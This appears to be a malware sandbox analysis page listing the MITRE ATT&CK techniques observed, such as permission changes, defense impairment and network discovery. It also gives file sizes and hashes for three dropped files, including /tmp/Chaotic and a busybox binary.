MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
68KB

MD5
60e197919a265617f21c21e25320c549

SHA1
b06f09b251f855c2e3cadbee08e426be790698cf

SHA256
bd145676c6767709d39d47eb2bb2fe5051b790db64bf150b233d3f49438346b2

SHA512
652f8341e27f00272f3ee4164900c5f02e0c7c763b9edc0405107ce2126ce2c700c9318e3ea29a73125d77d4b16b961860a514b0580170d019976fa7765792d1

Download Submit
/tmp/busybox

Filesize
2.0MB

MD5
b4dede5fc0b1bad5cb8e901bde126b97

SHA1
10cbe9a418ad84a1ed297948539d37aeb58dd810

SHA256
a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

SHA512
45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Download Submit
/tmp/jade.arc

Filesize
275B

MD5
cba0261779bc762dcaa59e48bca8c298

SHA1
f5747b8818b87d36e684c31ee32cae265ae63cd0

SHA256
52ea3a00ff42e925a9f1862b63765b9ac279abb244f7e43ac010e42c76fcc918

SHA512
f322ac8ba03308f52db0478080d60f419d2bc195d4eeccee0365fd66d13f99032c491f55ae952dd9685064825f07b5c8c381a68ca3928c22164009861b3da702

Download Submit